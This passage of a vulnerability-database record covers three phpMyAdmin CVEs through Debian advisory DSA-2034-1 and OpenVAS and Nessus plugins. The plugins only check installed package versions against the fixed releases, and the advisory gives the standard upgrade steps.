MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several vulnerabilities have been discovered in phpMyAdmin, a tool\nto administer MySQL over the web. The Common Vulnerabilities and Exposures\nproject identifies the following problems:\n\nCVE-2008-7251\n\nphpMyAdmin may create a temporary directory, if the configured directory\ndoes not exist yet, with insecure filesystem permissions.\n\nCVE-2008-7252\n\nphpMyAdmin uses predictable filenames for temporary files, which may\nlead to a local denial of service attack or privilege escalation.\n\nCVE-2009-4605\n\nThe setup.php script shipped with phpMyAdmin may unserialize untrusted\ndata, allowing for cross site request forgery.\n\n\nFor the stable distribution (lenny), these problems have been fixed in version\nphpmyadmin 2.11.8.1-5+lenny4.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 3.2.4-1.\n\nWe recommend that you upgrade your phpmyadmin package.\";\ntag_summary = \"The remote host is missing an update to phpmyadmin\nannounced via advisory DSA 2034-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202034-1\";\n\n\nif(description)\n{\n script_id(67338);\n script_version(\"$Revision: 6614 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:09:12 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-05-04 05:52:15 +0200 (Tue, 04 May 2010)\");\n script_cve_id(\"CVE-2008-7251\", \"CVE-2008-7252\", \"CVE-2009-4605\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 2034-1 (phpmyadmin)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"phpmyadmin\", ver:\"2.11.8.1-5+lenny4\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2020-08-12T00:53:18", "bulletinFamily": "unix", "cvelist": ["CVE-2008-7252", "CVE-2009-4605", "CVE-2008-7251"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-2034-1 security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nApril 17, 2010 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : phpmyadmin\nVulnerability : several\nProblem type : local/remote\nDebian-specific: no\nCVE Id(s) : CVE-2008-7251 CVE-2008-7252 CVE-2009-4605\n\nSeveral vulnerabilities have been discovered in phpMyAdmin, a tool\nto administer MySQL over the web. The Common Vulnerabilities and Exposures\nproject identifies the following problems:\n\nCVE-2008-7251\n\n phpMyAdmin may create a temporary directory, if the configured directory\n does not exist yet, with insecure filesystem permissions.\n\nCVE-2008-7252\n\n phpMyAdmin uses predictable filenames for temporary files, which may\n lead to a local denial of service attack or privilege escalation.\n\nCVE-2009-4605\n\n The setup.php script shipped with phpMyAdmin may unserialize untrusted\n data, allowing for cross site request forgery.\n\n\nFor the stable distribution (lenny), these problems have been fixed in version\nphpmyadmin 2.11.8.1-5+lenny4.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 3.2.4-1.\n\nWe recommend that you upgrade your phpmyadmin package.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/p/phpmyadmin/phpmyadmin_2.11.8.1-5+lenny4.dsc\n Size/MD5 checksum: 1548 70357c2a96c6299a24cd7ad1ce2c99a6\n http://security.debian.org/pool/updates/main/p/phpmyadmin/phpmyadmin_2.11.8.1-5+lenny4.diff.gz\n Size/MD5 checksum: 69878 16131d1f08db63eafc8c08e7743461f4\n http://security.debian.org/pool/updates/main/p/phpmyadmin/phpmyadmin_2.11.8.1.orig.tar.gz\n Size/MD5 checksum: 2870014 075301d16404c2d7d58216efc14f7a50\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/p/phpmyadmin/phpmyadmin_2.11.8.1-5+lenny4_all.deb\n Size/MD5 checksum: 2883680 bd7220bf95adb17384462ff6d5246165\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 8, "modified": "2010-04-17T12:36:05", "published": "2010-04-17T12:36:05", "id": "DEBIAN:DSA-2034-1:622E3", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2010/msg00074.html", "title": "[SECURITY] [DSA 2034-1] New phpmyadmin packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-06T09:45:58", "description": "Several vulnerabilities have been discovered in phpMyAdmin, a tool to\nadminister MySQL over the web. The Common Vulnerabilities and\nExposures project identifies the following problems :\n\n - CVE-2008-7251\n phpMyAdmin may create a temporary directory, if the\n configured directory does not exist yet, with insecure\n filesystem permissions.\n\n - CVE-2008-7252\n phpMyAdmin uses predictable filenames for temporary\n files, which may lead to a local denial of service\n attack or privilege escalation.\n\n - CVE-2009-4605\n The setup.php script shipped with phpMyAdmin may\n unserialize untrusted data, allowing for cross site\n request forgery.", "edition": 26, "published": "2010-04-19T00:00:00", "title": "Debian DSA-2034-1 : phpmyadmin - several vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-7252", "CVE-2009-4605", "CVE-2008-7251"], "modified": "2010-04-19T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:phpmyadmin", "cpe:/o:debian:debian_linux:5.0"], "id": "DEBIAN_DSA-2034.NASL", "href": "https://www.tenable.com/plugins/nessus/45556", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2034. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(45556);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2008-7251\", \"CVE-2008-7252\", \"CVE-2009-4605\");\n script_bugtraq_id(37826);\n script_xref(name:\"DSA\", value:\"2034\");\n\n script_name(english:\"Debian DSA-2034-1 : phpmyadmin - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in phpMyAdmin, a tool to\nadminister MySQL over the web. The Common Vulnerabilities and\nExposures project identifies the following problems :\n\n - CVE-2008-7251\n phpMyAdmin may create a temporary directory, if the\n configured directory does not exist yet, with insecure\n filesystem permissions.\n\n - CVE-2008-7252\n phpMyAdmin uses predictable filenames for temporary\n files, which may lead to a local denial of service\n attack or privilege escalation.\n\n - CVE-2009-4605\n The setup.php script shipped with phpMyAdmin may\n unserialize untrusted data, allowing for cross site\n request forgery.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-7251\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-7252\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-4605\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2010/dsa-2034\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the phpmyadmin package.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion phpmyadmin 2.11.8.1-5+lenny4.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:phpmyadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/04/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/04/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"5.0\", prefix:\"phpmyadmin\", reference:\"2.11.8.1-5+lenny4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:03:39", "description": "The use of unserialize() on POST data which could have lead to remote\ncode execution (CVE-2009-4605) has been fixed as well as some minor\ntemporary file issues (CVE-2008-7251, CVE-2008-7252).", "edition": 23, "published": "2010-01-18T00:00:00", "title": "openSUSE Security Update : phpMyAdmin (phpMyAdmin-1801)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-7252", "CVE-2009-4605", "CVE-2008-7251"], "modified": "2010-01-18T00:00:00", "cpe": ["cpe:/o:novell:opensuse:11.0", "p-cpe:/a:novell:opensuse:phpMyAdmin"], "id": "SUSE_11_0_PHPMYADMIN-091209.NASL", "href": "https://www.tenable.com/plugins/nessus/44044", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update phpMyAdmin-1801.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(44044);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-7251\", \"CVE-2008-7252\", \"CVE-2009-4605\");\n\n script_name(english:\"openSUSE Security Update : phpMyAdmin (phpMyAdmin-1801)\");\n script_summary(english:\"Check for the phpMyAdmin-1801 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The use of unserialize() on POST data which could have lead to remote\ncode execution (CVE-2009-4605) has been fixed as well as some minor\ntemporary file issues (CVE-2008-7251, CVE-2008-7252).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=559569\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpMyAdmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"phpMyAdmin-2.11.9.6-0.3\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}